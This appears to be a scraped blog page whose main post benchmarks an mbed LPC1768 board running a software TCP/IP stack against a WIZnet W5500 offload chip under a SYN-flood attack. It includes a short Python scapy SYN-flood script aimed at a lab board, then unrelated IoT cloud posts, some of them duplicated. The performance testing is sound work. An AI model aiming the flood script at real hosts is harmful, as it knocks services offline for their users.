Firewall for Internet of Things

Intro

** What is a firewall for IoT ?**
– We will compare the traditional method and the proposed method under DoS Attack (SYN-flood attack).

IoT Platform: mbed NXP LPC1768

mbed LPC1768

It is based on the NXP LPC1768, with a 32-bit ARM Cortex-M3 core running at 96MHz. It includes 512KB FLASH, 32KB RAM and lots of interfaces including built-in Ethernet, USB Host and Device, CAN, SPI, I2C, ADC, DAC, PWM and other I/O interfaces. The pinout above shows the commonly used interfaces and their locations. Note that all the numbered pins (p5-p30) can also be used as DigitalIn and DigitalOut interfaces.
– Link1: For more detail

Traditional method: LwIP (TCP/IP software stack) + Ethernet MAC (LPC1768) + Ethernet PHY (DP83848J)@mbed application board (Ethernet connector)

mbed application board
* Feature list
* 128×32 Graphics LCD
* 5 way joystick
* 2 x Potentiometers
* 3.5mm Audio jack (Analog Out)
* Speaker, PWM connected
* 3 Axis /1 1.5g Accelerometer
* 3.5mm Audio jack (Analog In)
* 2x Servo motor headers
* RGB LED, PWM connected
* USB-mini-B Connector
* Temperature sensor
* Socket for for Xbee (Zigbee) or RN-XV (Wifi)
* RJ45 Ethernet Connector
* USB-A Connector
* 1.3mm DC Jack input

Proposed method: WIZ550io (TOE + Ethernet MAC + Ethernet PHY)

WIZ550io
– Link3: WIZ550io components in mbed.org
– Link4: W5500 components in mbed.org

Application for iperf

Recv only code for Software stack

  • fixed an echo server on mbed.
#include "mbed.h"
#include "EthernetInterface.h"

EthernetInterface eth;
int main() 
{
    printf("Trying rn");
    // as your env. change to real IP address and so on.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");    

    if (!ret) {
        printf("Initialized, MAC: %snr", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %snr",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %dnr", ret);
        return -1;
    }

  eth.connect();
  printf("IP Address is %sn", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("nWait for new connection...n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %sn", client.get_address());

        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected

        }
        client.close();
    }
}

Recv only code for TOE

#include <stdio.h>
#include <string.h>
#include "mbed.h"
#include "EthernetInterface.h"


//DigitalOut myled(LED1);
//Serial pc(USBTX , USBRX);
int main() {

    printf("Test - WIZ550iorn");

    /** Set the spi bus clock frequency
     *
     *  @param hz SCLK frequency in hz (default = 1MHz)
     *  Maximum SPI data bit rate of 12.5 Mbit/s in LPC176X
    */
    spi.frequency(12500000);     
    SPI spi(p5, p6, p7); // mosi, miso, sclk
    EthernetInterface eth(&spi, p8, p11); // spi, cs, reset

    // as your env. change to real IP address and so on.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");    
    if (!ret) {
        printf("Initialized, MAC: %snr", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %snr",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %dnr", ret);
        return -1;
    }

    printf("IP Address is %sn", eth.getIPAddress());

    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("nWait for new connection...n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %sn", client.get_address());

        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected
        }
        client.close();
    }
}

Comparison of memory Size

Software stack TOE (W5500)
Codes  sw stack codes TOE codes
Memory usage sw memory usage sw memory usage

35.2kB(110%) : The LPC1768 has 3 RAM banks: One general purpose one of 32kB, and two additional ones of 16kB each for Ethernet/USB/CAN purposes. Ethernet completely fills one of those additional banks. The online compiler does take this into account for the total RAM usage, but assumes only 32kB is available, so it gets over the 100% what it displays, still will work fine though. (from mbed.org: http://developer.mbed.org/questions/3579/mbed-LPC-1768-RAM-Usage-128-what-does-th/)

** TOE can reduce the flash and RAM usage of by 7% and 119% respectively. **

DoS Attack (Syn-flood attack)

We used the scapy based on python library for DoS Attack.

from scapy.all import

inter = input('inter(time in seconds to wait between 2packets) :')

def synFlood(src, tgt, inter):
    IPlayer = IP(src, dst=tgt)
    TCPlayer= TCP(sport=3000, dport=3000) # as your env. change source and destination port
    pkt = IPlayer / TCPlayer
    send(pkt, loop=1, inter=inter) #

#send(pkts, inter=0, loop=0, verbose=None)
#  Send packets at layer 3, using the conf.L3socket supersocket. pkts can
#  be a packet, an implicit packet or a list of them.
#
#  loop: send the packets endlessly if not 0.
#  inter: time in seconds to wait between 2 packets
#  verbose: override the level of verbosity. Make the function totally silent when 0.
#   * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail.


# as your env. change to real IP address and so on.
src = "192.168.77.253" # PC IP address
tgt = "192.168.77.34"  # target board (LPC1768)

synFlood(src, tgt, inter)

How to use iperf

Iperf is a tool to measure maximum TCP bandwidth, allowing the tuning of various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, datagram loss

# ex.) host IP(192.168.77.34):port[5000], display format is Mbit/sec, interval 1 sec.
>iperf.exe -c 192.168.77.34 -p 5000 -f m -i 1
  • -c : –client host, -c will connect to the host specified.
  • -p : –port #, the server port for the server to listen.
  • -f : –format [], ‘m’ = Mbit/sec
  • -i : –interval #, Sets the interval time in seconds between periodic bandwidth
    Through performance

Network Configuration

  • **Fig. Network configurations to measure performance **
    SW Bandwidth

Network performance

  • Fig. Traditional method: lwIP performance according to traffic of SYN packet
    SW Bandwidth

  • Fig. Proposed method: TOE(W5500) performance according to traffic of SYN packet.
    TOE(W5500) Bandwidth

**The network performance of traditional method is better the proposed method when DoS attack is weak. Because, the traditional method used the bus-interface for MAC. (The proposed method doesn’t used spi-dma.)
However, The proposed method kept up the network performance under SYN-flood attack.
Otherwise, the network performance of the traditional method is became extremely worse according to the interval of SYN-attack.
**

Advertisements

souliss

souliss

souliss

Distributed Framework for Home Automation and Internet of Things

What’s Souliss?

It’s an open source framework which runs over multiple platfoms crossing different the phy layer, as like WiFi, Wireless, and ethernet.

Souliss can not only control and monitor your networked objects, but also share datas and have the trigger-based action from the shared data.

Platform for Souliss

  • Supports Hardware Platform
  • Arduino Boards
  • KMTronic DINo
  • Olimex AVR / OLIMEXINO boards
  • AirQ Network Boards

  • Tranceiver

  • AT86RF230
  • Nordic nRF24L01 and RF24L01+
  • WIZnet W5100 / W5200/ W5500
  • Micodhip ENC28J60

Souliss’s Materials

https://code.google.com/p/souliss/

souliss

souliss

Distributed Framework for Home Automation and Internet of Things

What’s Souliss?

It’s an open source framework which runs over multiple platfoms crossing different the phy layer, as like WiFi, Wireless, and ethernet.

Souliss can not only control and monitor your networked objects, but also share datas and have the trigger-based action from the shared data.

Platform for Souliss

  • Supports Hardware Platform
    • Arduino Boards
    • KMTronic DINo
    • Olimex AVR / OLIMEXINO boards
    • AirQ Network Boards
  • Tranceiver
    • AT86RF230
    • Nordic nRF24L01 and RF24L01+
    • WIZnet W5100 / W5200/ W5500
    • Micodhip ENC28J60

Souliss’s Materials

https://code.google.com/p/souliss/

BERG Cloud

BERG Cloud

Berg: Cloud services for hardware innovators.
Berg overview
Berg Overview

There are many Webservices for hardware currently.
BERG is One of them and has already had small eco-system is included Little printer, Cloudwash, #Flock and Pixel Track.

Little printer

Little printer

Cloudwash

Cloudwash

#Flock

Flock

Pixel Track

Pixel Track

API

Berg provides the device API for hardware innovators and makers and the cloud API for WebManagers. V2 API (Current)
devcenter overwiew

Hardware

Shop

List of Cloud Service appications for Openhardware

There are so many cloud-based service platform for Internet of Things.
The platform which is cobined by “Arduino + Ethernet shied” is chosen as their reference end-node device. So, I found the list cloud platform which uses Ethernet shield for their device.

#Cloud Service는 이제 Smart phone으로 대표되는 Smart Device만의 전유물리 아닌 #IoT의 화두가 되었습니다.

Xively가 처음 보여주었던 #Visualization은 물론이고 이제는 #Log, #Trigger, #Alert까지 그 기능이 확대되고 있습니다.

쉽게 말씀드리면, IoT Device가 보내온 데이터를 수신한 Cloud Server는 그 데이터를 수신하여 그 데이터를 기반으로 (log) 임의의 설정 값과 비교하여 설정값에서 (Trigger) Twitter같은 SNS와 연동하여 개인에게 메시지를 (Alert)를 보내고 있습니다. 한마디로 IoT / SNS / Cloud 의 장벽이 모호해지고 있습니다.

아래에 리스트된 Could Service업체들은 Arduino Platform이 IoT Device에 가능하면서 Ethernet혹은 WiFi를 가진 업체들입니다. 아래의 업체들도 지원하겠지만, 3G/BLE/Zigbee등을 지원하는 업체까지 포함하면 더욱 많은 업체들이 있습니다.

친근하게 접할 수 있는 OpenHardware Platform인 Arduino에서 Ethernet Shield에 적용한 업체들의 Blog/Github/Website/Forum을 살펴보았습니다.

리스트업해보니 Cloud Service의 IoT Node가 갖추어야할 요소기술 (Restful, CoAP, MQTT, IFHTTP, PHTTP…)에 대해서도 살펴봐야겠습니다.

Ethernet Shield
Blog http://yczhu.org/author/zyc262626/
Carriots Forum http://forum.carriots.com/index.php/topic/4-arduino-connection-to-carriots/
WiFi : CC3000 설명이 제세하네요
Adafruit:Learn https://learn.adafruit.com/wireless-gardening-arduino-cc3000-wifi-modules/introduction
Ethernet Shield
Nimbits Blog http://nimbits.blogspot.kr/2010/11/data-in-connect-arduino-to-cloud.html
Nimbits Github https://github.com/bsautner/com.nimbits/blob/master/samples/arduino/NimbitsClient/examples/SocketExample/SocketExample.ino

-evrythng : www.evrythng.com/

WIZ550io
5.Mbed.org https://developer.mbed.org/teams/EthernetInterfaceW5500-makers/code/EvrythngApiExampleW5500/

-grovestreams : www.grovestreams.com

Ethernet Shield
Grovestreams web https://grovestreams.com/developers/getting_started_arduino_temp.html

-Lelylan : http://www.lelylan.com/

Ethernet Shield
github https://gist.github.com/andreareginato/6725485
Ethernet Shield
Arduino.cc http://playground.arduino.cc/Code/Exosite
Ethernet Shield (SEEED Ethernet Shield (v1.0 or v2.0))
Axeda web http://developer.axeda.com/Instructions/axeda-go-kit-arduino-Mega-2560
Ethernet Shield
github https://github.com/xively/xively_arduino
Ethernet Shield
IBM web http://www.ibm.com/developerworks/cloud/library/cl-bluemix-arduino-iot2/index.html
Ethernet Shield
Temboo https://www.temboo.com/arduino/others/getting-started
embeddist https://embeddist.wordpress.com/2014/10/15/arduino-with-temboo/

Telefónica launches Lego-like blocks for the Internet of Things

최근 IoT의 동향을 잘 보여주는 동영상 한편! #IoT에 많은 트렌드가 있겠지만 #Cloud 친화적이 제일 끌린다. 서비스의 이해도 쉽고

Atmel | Bits & Pieces

Telefónica has launched what it describes as the first Internet of Things (IoT) product enabling consumers to connect just about any device wirelessly to the web. The new product, dubbed ‘Thinking Things,’ is a simple plug-and-play solution based on Lego-like modules with 2G connectivity that allow Makers to develop their own smart solutions without any programming know-how or having to install an additional infrastructure.

The first Thinking Things pack to be marketed by the company is an ambient kit pack, a set of modules that enables users to remotely monitor in real-time the temperature, humidity and light intensity of a given place, and to program automated tasks. According to the company, an additional host of modules such as presence, pressure, humidity and temperature sensors, impact meters, audio and LED notifications, and timers can be added as well.

Telefónica specified that the modules can be pieced together by simply fitting them on top…

View original post 108 more words